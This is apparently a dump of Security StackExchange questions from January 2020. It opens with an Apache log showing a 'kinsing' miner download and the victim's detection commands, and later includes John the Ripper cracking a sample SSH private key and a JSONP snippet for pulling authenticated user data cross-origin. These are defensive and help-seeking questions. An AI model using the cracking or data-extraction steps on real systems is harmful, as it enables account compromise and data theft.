+HTTP request sent, awaiting response... 200 OK
+Length: 17072128 (16M) [application/octet-stream]
+Saving to: '/var/tmp/kinsing'
+
+     0K .......... .......... .......... .......... ..........  0% 1.54M 11s
+    50K .......... .......... .......... .......... ..........  0% 3.62M 7s
+   100K .......... .......... .......... .......... ..........  0% 5.97M 6s
+   150K .......... .......... .......... .......... ..........  1% 7.92M 5s
+ 16500K .......... .......... .......... .......... .......... 99% 11.5M 0s
+ 16550K .......... .......... .......... .......... .......... 99% 9.01M 0s
+ 16600K .......... .......... .......... .......... .......... 99% 11.3M 0s
+ 16650K .......... .......... ..                              100% 28.2M=1.5s
+
+2020-01-10 19:03:31 (10.8 MB/s) - '/var/tmp/kinsing' saved [17072128/17072128]
+
+sh: echo: I/O error
+sh: echo: I/O error
+ +

This is in the main apache2 error log file (/var/log/apache2/error.log) and not in my website's error log, so I am thinking that it is not related to my PHP code. What should I do/check next?
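
For reference, the kind of checks I can still run (assuming the web server runs as www-data; the user name and paths are guesses):

crontab -l -u www-data                      # where the wget cron line is most likely installed
ps aux | grep -E 'kinsing|kdevtmpfsi'       # miner and watchdog processes
ss -tnp | grep -E 'kinsing|kdevtmpfsi'      # their outbound connections
grep -RIl 195.3.146.118 /var/www            # any dropped or modified file referencing that IP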

+",224902,,,,,1/12/2020 19:53,A bitcoin miner is getting install on my web server with the apache2 process,,0,5,,1/12/2020 20:06,,CC BY-SA 4.0 +224082,1,224091,,1/12/2020 17:13,,1,137,"

Scope: penetration testing of web server with critical information in it (user management).

+ +

I had an argument with my colleague about security in web sockets, and I got stuck with him on one topic, which is the following:

+ +
    +
  • Is it secure to let any inbound connection into the web-socket +without filtering the source of the connection?
  • +
+ +

Let me explain my opinion on that:

+ +
    +
  • Only an authorized user (identified by a certain cookie which is already on the server) can connect to the web-sockets gateway (WSG) via server S; then the handshake happens (101) and the communication starts.
  • +
+ +

His opinion is that:

+ +
    +
  • Every user, no matter whether they have the cookie or not, can query the web-socket gateway.
  • +
+ +

From my point of view, if we allow any connection request to the web-socket gateway, it may result in:

+ +
    +
  1. Unrestricted flood.
  2. +
  3. Scans.
  4. +
  5. Exploitation of possible vulnerability of the server to extract sensitive data.
  6. +
+ +

What do you think?

+",212252,,212252,,1/12/2020 17:27,1/12/2020 22:58,Security in web sockets,,1,3,,,,CC BY-SA 4.0 +224088,1,,,1/12/2020 21:37,,2,923,"

Since the GDPR landed, many websites have to inform you about their cookie usage and give you an option to enable/disable them per provider and per purpose of storage. Say I find a link I want to read, but the site asks for consent to store cookies on my device (which I would rather not give, if possible).

+ +

Am I fine if I open a private/incognito window and accept all cookies there and close it after I'm done?

+ +

The reason behind this is that having to withdraw consent for every link I click quickly becomes a tedious task. Please also note that disabling cookies is not an option, for two reasons: there are sites whose cookies I do want to store, and I intend to do this on all of my devices, not only on a specific system.

+",224900,,,,,1/12/2020 22:15,"Is there any drawbacks of ""accepting all cookies"" while in incognito mode?",,1,0,,,,CC BY-SA 4.0 +224090,1,,,1/12/2020 22:32,,1,368,"

Do e-mail proxy services exist to improve privacy and security?

+ +

Privacy in the sense that one wouldn't need to give a website one's username (possibly even in the firstname.lastname@domain.tld form), and security in the sense that the e-mail address used couldn't itself be used to log into the e-mail service (thereby making a leaked password useless, because the e-mail address couldn't be used to log in).

+ +

Example:

+ +

john.doe@gmail.com could be someone's e-mail. If there were a Google privacy/proxy service, then one could generate as many random e-mail addresses as needed, and if one of them were sent spam, or leaked, it could be disabled:

+ +
    +
  • abcdef@gmail.proxy
  • +
  • 290dcef@gmail.proxy
  • +
+ +

could both redirect mail to john.doe@gmail.com.

+ +

One could be blocked/disabled/removed if wanted without abandoning the real account (e.g. because 290dcef@gmail.proxy has been compromised or spam is being sent to it).

+ +

Would it really improve security and privacy? Or am I missing something?

+ +

And does such a service exist? (as a bonus, replying from such proxy e-mails would be even better, converting the real account from field to the proxy mail address)

+",65956,,65956,,1/12/2020 22:38,4/4/2022 13:07,E-Mail privacy proxy for hiding real e-mail?,,4,2,,,,CC BY-SA 4.0 +224101,1,224104,,1/13/2020 8:16,,1,98,"

I know that if an application sets debuggable to true in the manifest, a user with physical access can debug the application and get access to the private directory of the debuggable application.

+ +

But is it possible for another installed app to exploit the debuggable application, or is it only exploitable with physical access?

+ +

Thank you.

+",224934,,,,,1/13/2020 9:49,Is a debuggable android application exploitable from another application?,,1,0,,,,CC BY-SA 4.0 +224109,1,224283,,1/13/2020 11:29,,4,34270,"

I am trying to crack a password-protected id_rsa with John the Ripper, but it doesn't find the correct password for some reason.

+ +

I have created a new user and generated a new id_rsa with ssh-keygen (the password used is ""password"").

+ +
pwn@kali:~$ ls -l .ssh/                                                   
+total 4                                                                   
+-rw-r--r-- 1 pwn pwn 222 janv. 10 18:10 known_hosts                       
+
+pwn@kali:~$ ssh-keygen                                                    
+Generating public/private rsa key pair.                                   
+Enter file in which to save the key (/home/pwn/.ssh/id_rsa):              
+Enter passphrase (empty for no passphrase):                               
+Enter same passphrase again:                                              
+Your identification has been saved in /home/pwn/.ssh/id_rsa.              
+Your public key has been saved in /home/pwn/.ssh/id_rsa.pub.              
+The key fingerprint is:                                                   
+SHA256:mYmLGXR2b8Au7d41sZukTEAIhRQI8UAtQHWf2xnF/ug pwn@kali               
+The key's randomart image is:                                             
++---[RSA 3072]----+                                                       
+|O=o++=.   ..     |                                                       
+| +..o..o. ..     |                                                       
+|  o . +o=..      |                                                       
+|   . o *o*o.     |                                                       
+|    . o.Soo +    |                                                       
+|     + + o . +   |                                                       
+|    o . . o =    |                                                       
+|       . + E +   |                                                       
+|        . + o    |                                                       
++----[SHA256]-----+                                                       
+pwn@kali:~$                                                               
+
+pwn@kali:~$ ls -l .ssh/                                                   
+total 12                                                                  
+-rw------- 1 pwn pwn 2635 janv. 13 12:05 **id_rsa**                           
+-rw-r--r-- 1 pwn pwn  562 janv. 13 12:05 **id_rsa.pub**                       
+-rw-r--r-- 1 pwn pwn  222 janv. 10 18:10 known_hosts                      
+
+ +

The result is the following file :

+ +
pwn@kali:~$ cat ~/.ssh/id_rsa                                         
+-----BEGIN OPENSSH PRIVATE KEY-----                                   
+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
+hF2Y9w==                                                              
+-----END OPENSSH PRIVATE KEY-----                                     
+
+ +

I have used ssh2john to create a file crackable by john:

+ +
# /usr/share/john/ssh2john.py id_rsa 
+id_rsa:$sshng$2$16$78b3f467a4d959ebb78a6cb995826c8d$1894$6f70656e7373682d6b65792d7631000000000a6165733235362d63747200000006626372797074000000180000001078b3f467a4d959ebb78a6cb995826c8d000000100000000100000197000000077373682d7273610000000301
+00010000018100ccf00ae75735e47c194add92468ba57346e879344bbf6919859088c4bda858427133048beb34add55c19281abbb54d3c46c29e21ff2510ff76f6251d87d48bac392f6226c4f30e12ea640248780d6ca5f9c811cb2b6af99f33c2bd57fad3ff6e4aaa9481e2df0655874674aebef842176
+539dcd879e204a6b9e6d1656f47c10e2da00bdb38e20299c978bc9015fb3c89d58614dc8c950248d76c4085f42d5c449da1fa37ead889297f7234e858ec9b04bed0e86695297b7ecf3f60a0536fd5bfb070edf7c896d1661414224efb5447d1420e26014fa5ce6241551e12368a50c2ff5f471d7a6508c8
+4875741c6fec8337018bba56abe3781d4323dea934c4f27972b8b9cbdaa711fffa822358cc85cc3b583955c01ef24fe294ce1b969527b01197dedb03990c36fafa3eeba6a82a73fbae935955e0775bfc458676512d60d0c72f5787bc45f6fe00c23cd19b83da20d836942ac0e3dc5b465ee52e5e5fac6f3
+c880ee1c4541ebd65f812926249652b1305db157eeb23edf30456de2529fb71c500000580a8c2691c0e3dcf3ebad9903e8a68df56241aa7d0dace3f744b5d69e4c87e2d7d9e1102d6dc52c64393dec3a1690725667a36556ab84e3e559fb22aab986cc304e65a7ba148707ca9d7b31957900d47055596a6
+72ba8cafcabbff82aa36422fa6c56eb727995c9f1e5508993b3119719ab446ef195ee7a8e2d0153adf34d5546052081547e40c92a174f11cf417ff8761ef913fa0e7844b9f3c351f40f978c5adc46cf93c734e743158757f1c254d499e1e15d0c075a84dc38d38dfb6c985f235f93d4efed9639d2675d95
+f246d38279a18ac7cc39b5d7bc433d6f1937b655edc5973331059789b91054c2f7b634119a1dd0f59019a83ce79e0161a491e96f812c08055abeda65478d905e936bd4302f98b10ba1ff3a607077c6b554598b080c1dbb1e2636216ef34958039ceeb8a603049ff3e610ecb4b2a1e576fac657e5bf20359
+a01e69cc21a9b6ef2be64cf0d7dbf759a080b331ccd5f0dc29164292c70bd271bc856382a6eaa03aab97be6394bfeaaebf476b84c72cae5f615548ccebb23066e53adbbb696181495a1c10a8860a8434e19fa6b2a366ca6350bb99bc5e5f502f3990d91e920f5eca6e50a8a5cb6d597f49498261e9c0e65
+28fe194f912a0390dd0c0db0a006dd6b1e071b73bc5dfc82e0e289297466d7265e49b7191f70c29d92ed41a0b3a7c181fd10278fe826c6e9db64033246a60ad10a4fc885fcb73a3745e82f150ba427beb243d300c8c9b4555e13c4862b867b442f3f4cafcea2b2bd639a9cb2d7ec3d0d8be0142066563db
+792403234776c7191ade460f68220bf9229e30a64f5834827484dc0628f62fcbfd83a437eaa2c7419b09bc396cf2d6604858627d1eb28ee3cedf6f0cf1b01d5241772d74d7ea1a9f4a366f13f4a5ab0425c20c223b446f368d2d0e91b043d880a03ee00a54c9e190e5b700cf21198c9c77b0349a5307506
+e23687b3f6339d13b206156c19af2f51c51196fed7be20cbaea950f9714c5e012f455c1511319220351cf8e467f50d4df9d9d1b215030fc529e18dfd55611f8211864019736c3947204583937408c24005e6507f42d651dab5d68d652380722adac120155f814d36f42b4c4bd72b74b0e377c232b8b92f9
+a97c73eaa50417d9d50c93d0b6ac8f8036fdac99149906215e76273362a1780369cd152b3c86aa5f250e70535a58ca2bc854395e0f8b267f056b43e4c24a79fa9157be0a3daeecd5c0a18dda6088cf3378753731275c8e1568266ad920538755479f31e0d082f514bb2f8dd46474fcdb84dc919e38feacc
+27f1cecddbcb3371c1901c991b77df44c1959b4dc88f19ffb4ea190e7312b2a220a5c7b408c6148dfbf192311061cd1046244ba9978c0a44daa0808ee99d4b2df26aaf22fafb2e78d6996c2b118b2e17c36da27476a38cd24c18c0c7c675b50d38648b0db59385604832a3cff835a50d23e9c309ee298ee
+4cf078d0a546a2be131f283d7f4be3ce3e988b58cce2d0ff3dc0f3e66b52391ecd666a0017945d3e0148e88eb782e37597486657ee872f92ed2afea2c3d58ae96624274b3578299e3cfebe508e5f31d817cee7ac546718935cadc34ee55c73ed039ec282947bf7699eded4a73c7673158666c5cf6eb1344
+d66f104c8b7ef151b05e408bc9134395443d19707b872ab7f3e20d8e32559a2d0cd6fbad8ed6312151add37badf2f3fddeec68dca80da80a08ff5981970739136f6b9cfaf5739a4aa9e8fc4e6aa9a654c8cf1fc83f6a72b64993e0f6640fb0854e481a93543610d3432ce14285fa6d37c912cd2d9a98daf
+c61963de122726c20652c196d8ba6d29c413f553c8b70c03311beae46d3a009dd6f21cf3b29524cfb7807f13b95ae53fe84016a73dff5ad4b70d8571886f55f405dbf3eb379a6ebb63ce200e9016b253e349d832c75ca3315a203ba973468486bdd4f54b2a8eeac4638b52111be47ef07fcc031d9163549
+97f92b52383f3845d98f7$16$486                               
+
+
+# /usr/share/john/ssh2john.py id_rsa > id_rsa.hashes
+
+ +

But john doesn't find the password ""password"" using a wordlist that contains ""password"" in 4th position.

+ +
# grep -x password -n /usr/share/wordlists/rockyou.txt
+4:password
+
+# john -w /usr/share/wordlists/rockyou.txt --format=SSH id_rsa.hashes 
+Warning: invalid UTF-8 seen reading /usr/share/wordlists/rockyou.txt
+Using default input encoding: UTF-8
+Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
+Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
+Cost 2 (iteration count) is 16 for all loaded hashes
+Will run 4 OpenMP threads
+Note: This format may emit false positives, so it will keep trying even after
+finding a possible candidate.
+Press 'q' or Ctrl-C to abort, almost any other key for status
+0g 0:00:02:34 DONE (2020-01-13 12:15) 0g/s 23.00p/s 23.00c/s 23.00C/s paagal..sss
+Session completed
+
+**# john --show id_rsa.hashes 
+0 password hashes cracked, 1 left**
+
+
+ +

I guess the problem is in the --format option used. But I don't see a more suitable one.
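
One isolation step I have not tried yet is a one-line wordlist, to separate a wordlist or encoding problem from a format problem:

echo 'password' > single.txt
john --wordlist=single.txt --format=SSH id_rsa.hashes
john --show id_rsa.hashes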

+",160617,,35683,,1/25/2021 0:58,1/25/2021 0:58,How do I crack an id_rsa encrypted private key with john the ripper?,,4,0,1,,,CC BY-SA 4.0 +224113,1,,,1/13/2020 11:57,,1,117,"

How can I find out the block cipher mode used in a PEM certificate I have? It's been generated with an intermediate CA that does sha256WithRSAEncryption, but I need to find out whether it's GCM or CBC to properly configure some devices.

+",219288,,98538,,1/13/2020 12:12,1/13/2020 14:44,What's the block cipher mode of my PEM certificate?,,1,0,,,,CC BY-SA 4.0 +224115,1,,,1/13/2020 12:47,,0,113,"

+ +

+ +

I was checking my Plesk hosting logs for web and database development. Somehow, I saw some weird IPs trying to communicate with the hosting. I wonder what the purpose of these anonymous requests is. Should I just ignore them, as they are a common occurrence?

+ +

Thanks in advance. P.S.: This website is still in the development stage; no one should know this website's address yet.

+",224946,,,,,1/13/2020 13:01,Why there are some weird requests to my web hosting,,1,3,,1/13/2020 14:47,,CC BY-SA 4.0 +224118,1,224125,,1/13/2020 13:35,,1,445,"

Per my understanding, the same-origin policy (SOP) is enabled by default in all browsers. This means that a web browser permits scripts contained in a first web page to access data in a second web page only if both web pages have the same origin.

+ +

My question is: do we need to handle CSRF attacks separately with a CSRF token when SOP is in place? I see that almost all websites mitigate it by implementing CSRF tokens, but why is that required when SOP is in place?

+ +

I see another related mechanism, the “SameSite=strict” cookie attribute, mentioned in this blog to prevent CSRF. To me it looks like SOP, which is provided by the browser by default. So is it really required?
+",46027,,,,,1/13/2020 15:10,Same origin policy for CSRF attack?,,1,0,,,,CC BY-SA 4.0 +224119,1,224121,,1/13/2020 13:44,,0,111,"

Company A owns a building and leases out 2 offices to other companies.

+ +

Telecom 1 provides internet to Router 1 with ip address x.x.x.121

+ +

Company A connects their router, Router A, to it and gives it IP address x.x.x.122
+Company B connects their router, Router B, to it and gives it IP address x.x.x.123
+Company C connects their router, Router C, to it and gives it IP address x.x.x.124

+ +

Is that effectively the same as each company having a separate line?

+ +

Assume that A has control of the main router and each has access to their own router but no one else's.

+ +

EDIT: +In my case the main router is a Cisco 2811
+Company A is using a Ubiquiti EdgeMax
+Company B unsure
+Company C a BT home hub

+",191479,,191479,,1/13/2020 13:50,1/13/2020 14:00,Is each office having their own router coming off the main router as secure as each office having their own internet line,,1,1,1,,,CC BY-SA 4.0 +224120,1,,,1/13/2020 13:53,,1,216,"

From the official description:

+ +
+

HTTP Catcher is a web debugging proxy. It can be used to intercept, inspect, modify and replay web traffic.

+
+ +

Can someone explain to me how HTTP Catcher manages to do this? I have seen logs (sent to me by a colleague) where it seems that HTTP Catcher can show SSL traffic in clear for traffic from a separate application (which we are developing).

+ +

Shouldn't this be impossible for a separate application? Did we misconfigure something?

+ +

Note: it seems no certificate for HTTP Catcher was added to the local store (which would have explained how it is able to MITM without the app complaining about it).

+ +

(Regretfully I cannot share the screenshots, as they contain sensitive information.)

+",16145,,16145,,1/16/2020 7:07,1/16/2020 7:07,How does HTTP Catcher (iOS app) work on SSL/TLS?,,0,3,,1/13/2020 14:56,,CC BY-SA 4.0 +224126,1,,,1/13/2020 15:19,,0,74,"

I need to figure out how to run my application on Windows 10.

+ +
    +
  1. My application would run on an app-specific account (let's called it ""App"").

  2. +
  3. My application saves/reads PDFs from the folder ""PDF"". I need to make sure that ONLY the application and admin users may enter this folder. So I would add rights - so only admins and App can work with this folder.

  4. +
  5. Public key for encrypting these PDF is in the applications folder called ""resources"". I would add the same rights as I wrote in point 2. I need to make sure that no one else can copy that public key (only app and admin).

  6. +
+ +

Is this approach correct?
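
To make points 2 and 3 concrete, this is roughly the ACL setup I have in mind, assuming the folders live under C:\MyApp and the account is literally named App (paths and names are placeholders):

icacls C:\MyApp\PDF /inheritance:r /grant:r App:(OI)(CI)M /grant:r Administrators:(OI)(CI)F
icacls C:\MyApp\resources /inheritance:r /grant:r App:(OI)(CI)R /grant:r Administrators:(OI)(CI)F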

+",224958,,6253,,1/13/2020 15:31,1/13/2020 15:31,Securing application on windows 10,,0,2,,,,CC BY-SA 4.0 +224129,1,,,1/13/2020 16:02,,1,202,"

I am testing a web application and I have found an endpoint which returns some data in JSON. The endpoint is this:

+ +
/api/vtexid/pub/authenticated/user
+
+ +

Now I was testing whether this endpoint supports JSONP by appending a query parameter of ?callback=obj:

+ +
   /api/vtexid/pub/authenticated/user?callback=obj
+
+ +

When I open this URL, a file is downloaded, and it looks something like this:

+ +
obj({
+  ""userId"": ""123"",
+  ""user"": ""abc@gmail.com"",
+  ""userType"": ""F""
+})
+
+ +

Now, when I tried to load the endpoint in a <script> tag to extract the data:

+ +
<html>
+
+<script>
+function obj(d) {console.log(d)}
+</script>
+
+<script src=""https://www.example.com/api/vtexid/pub/authenticated/user?callback=obj"" type=""application/jsonp""></script>
+
+</html>
+
+ +

I ended up getting an error in the console that

+ +
+

Refused to execute script from + 'https://www.example.com/api/vtexid/pub/authenticated/user?callback=obj' + because its MIME type ('application/jsonp') is not executable, and + strict MIME type checking is enabled.

+
+ +

And looking into the Request Headers the Content-Type is set to application/jsonp

+ +

So is there any workaround for this to get the data?

+",224961,,,,,1/13/2020 16:02,How to handle application/jsonp response,,0,3,,,,CC BY-SA 4.0 +224131,1,224133,,1/13/2020 16:54,,0,233,"

I am scanning a Linux server which has two kernel versions stored. When I run the following command I can see, for example, these versions:

user@host [~]# rpm -q kernel
kernel-3.10.0-327.el7.x86_64
kernel-3.10.0-1062.4.1.el7.x86_64

When I run this command, which identifies the current kernel version being used on the server, it shows the newer version:

user@host [~]# uname -sr
Linux 3.10.0-1062.4.1.el7.x86_64

My security scanner reported that I have many vulnerabilities because of using kernel-3.10.0-327.el7.

Questions:

1. Does this mean that this is a false positive because I am not using this version on the server?
2. Where can I check if kernel-3.10.0-1062.4.1.el7.x86_64 is the latest kernel version?
+",156661,,61443,,1/13/2020 17:12,1/13/2020 17:13,Vulnerable stored Linux kernel version,,1,1,,,,CC BY-SA 4.0 +224135,1,,,1/13/2020 17:40,,0,323,"

I have just configured my Windows 10 desktop PC at home to automatically log into my Windows 10 user account that my Microsoft account is linked to on startup. My desktop is in my bedroom upstairs and I trust my parents who I live with to not snoop around. However, I was wondering if this could have any security concerns beyond ""your account is essentially passwordless when starting your PC"". For example, could someone abuse this usability change to steal my Microsoft password after logging in? Could someone do so through a malicious website? Could someone do so through a backdoor in an app?


In other words: which security risks does enabling automatic authentication on startup on a Windows 10 machine using a Microsoft account bring, beyond guaranteeing that an attacker with physical access to a non-booted machine can access my machine?

+",34161,,,,,2/1/2022 23:01,security concerns when configuring Windows 10 to automatically log into a Microsoft account-linked user account,,1,0,,,,CC BY-SA 4.0 +224144,1,,,1/13/2020 22:10,,0,200,"

If I know the hash of a program you intend to install is d306c9f6c5..., if I generate some other file that hashes to that value, I could wreak all sorts of havoc. - from https://nakamoto.com/hash-functions/


Theoretically, if you know the hash of a program one intends to install and you generate another file that hashes to that value, what could you do?
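
For context, this is the kind of integrity check such a collision would defeat (a minimal sketch; SHA-256 and the file name are just examples, and the published hash is left truncated as in the quote): the published hash is compared against the hash of whatever was actually downloaded, so a second file engineered to produce the same hash would pass the check.

import hashlib

published_hash = "d306c9f6c5..."   # truncated, as in the quote above

def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

# A maliciously crafted file that hashes to the same value would print OK too.
print("OK" if sha256_of("installer.exe") == published_hash else "MISMATCH")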

+",166507,,,,,1/18/2020 15:32,"Theoretically, If you know the hash of a program one intends to install and you generate another file that hashes to that value what could you do?",,2,3,,1/24/2020 14:27,,CC BY-SA 4.0 +224146,1,,,1/13/2020 22:19,,0,253,"

The standard file with packaging instructions (setup.py with setuptools) for Python contains an author_email field. Such a package can then be published to PyPI, but the code is also available publicly on github.


Am I unnecessarily cautious if I want to obfuscate the email address in the setup.py file (e.g. by calling base64.decodebytes())?

It seems inconsistent to have the address as ""john.doe[at]gmail.com"" (with brackets) in a README file but as a plain-text, legitimate email address in a Python file, yet I have seen no one obfuscating their setup.py address.

Nowadays spam filters perform well, but is there some interest in doing what I suggest? Or does it just make my code look like a virus?
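
As a concrete illustration of the idea (a minimal sketch only; the encoded string below is just the example address from above, base64-encoded):

import base64

# setup.py fragment: keep only the base64 form in the repository and decode it
# at packaging time. "am9obi5kb2VAZ21haWwuY29t" decodes to john.doe@gmail.com.
author_email = base64.decodebytes(b"am9obi5kb2VAZ21haWwuY29t").decode("ascii")

Of course, anyone who installs the package still ends up with the plain address in the built metadata, so this only defeats naive scraping of the repository text.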

+",113920,,,,,1/13/2020 22:19,Packaging Python code for github: should I obfuscate author email address from the `setup.py`?,,0,5,,,,CC BY-SA 4.0 +224147,1,,,1/13/2020 22:42,,1,999,"

Can you please explain the strengths of VeraCrypt and KeePass compared to each other?

1. What's theoretically easier to break if both use the exact same password for their respective containers: the VeraCrypt or the KeePass file?

2. Are they both still considered in the dev community as ""unbroken"" and safe encryption tools for storing data? Or are there successful attacks publicly known? Do they currently have any known weaknesses in their code bases?

3. Let's say you have a Text.txt file. In one case this txt file is stored in the VeraCrypt container, and a second time in the KeePass kdb as an attachment. Now, when you open both on your Windows system (mounting the VeraCrypt container and opening the KeePass kdb), which one is in this ""opened state"" more vulnerable, and to what kind of attacks? Which one isolates the .txt file in a better way? Here you can consider that you are connected to the Internet while those files are open, and you can consider any other attacks.

4. In the case of VeraCrypt: is the file's safety somehow decreased when we start opening the .txt file from within the VeraCrypt container? How does that impact potential unwanted file access?

5. What difference does it make in VeraCrypt to select algorithms in a different order, e.g. Serpent-AES or AES-Serpent? What impact does the order have on brute-forcing attacks?
+",213061,,6253,,1/13/2020 22:53,2/13/2020 0:01,Encryption strength veracrypt vs keepass?,,1,0,,,,CC BY-SA 4.0 +224148,1,224151,,1/13/2020 22:50,,1,389,"

I have run into this scenario a couple of times now but am hoping to get either confirmation that I'm on the right track or a suggestion as to what else should be done.

Situation

I am building a back-end web service that provides access to sensitive data or privileged operations. This web service will not be publicly accessible but will be called by a front-end application that is. There may ultimately be multiple applications that need to access the service but not necessarily with different levels of access.

We want to secure the web service so that other devices on the network are not able to make calls to the service, nor sniff traffic to determine how to authenticate.

Solution

Using a large, securely-generated random API key, which is sent via Basic authentication, the username and password are separated, the password hashed with SHA-256, and the result compared against a stored value for the user. This is done over TLS (i.e. with a pinned self-signed certificate or even with a valid CA-signed certificate) to prevent sniffing and to ensure that the client validates the server's authenticity.

Since the password is a large (let's say 128-bit) random value, the purpose of hashing the value is mostly:

1. To avoid storing the API key in the web service
2. To prevent timing attacks from string comparison against the actual API key, if it was actually stored by the application

Additional Thoughts

I considered doing a more typical password-hashing method (e.g. Argon2) but since the password is not intended to be human readable, it doesn't seem like much would be gained. Even salting the value doesn't seem like it would be very valuable since the space of possible API keys is so large.

There is also a definite need to keep this fast, since it will be sent with every request, so doing too much processing is not desirable.

Also, since this method is very straightforward, I'm not really looking for an alternate method if this one is secure enough. I'm really either looking for improvements that can be made to this schema or reasons that it's absolutely not secure (in which case I'm willing to hear about alternatives).
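
For point 2 above, the comparison I have in mind would look roughly like this (a minimal sketch; function and variable names are illustrative, and it assumes the server stores only the hex SHA-256 of each client's API key):

import hashlib
import hmac

def api_key_is_valid(presented_key: str, stored_sha256_hex: str) -> bool:
    presented_hex = hashlib.sha256(presented_key.encode("utf-8")).hexdigest()
    # hmac.compare_digest is a constant-time comparison, which avoids the
    # string-comparison timing leak mentioned in point 2.
    return hmac.compare_digest(presented_hex, stored_sha256_hex)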

+",51963,,51963,,1/13/2020 23:23,1/13/2020 23:23,Validating API keys in a back-end web-service with very few users,,1,6,,,,CC BY-SA 4.0 +224158,1,,,1/14/2020 4:25,,0,395,"

Years ago I had a bunch of bitcoin in a wallet that I encrypted. This was back when bitcoin was like $0.20 or $0.30 each. At one point I had a couple hundred of them but didn't know what to do with them. I lost the wallet and never really looked for it until the price skyrocketed, especially digging for it when the price was at $20k, but I never located it.

However, recently I got some old hard drives that had been stored at my parents' for years, and when looking through some of the drives I found a file btc.tar.gz.enc.

I don't remember creating this file, but again it was so long ago and the coins were nearly worthless, so I probably wouldn't remember. I have no idea how to open or decrypt the file...

I ran strings on it and I get this:

zoidberg@PlanetExpress:/mnt/c/Users/Keith/Documents$ strings btc.tar.gz.enc
Salted__
s}mS'.
)hXe
eFeI
?b`Z
OA&$>
%n&LBX
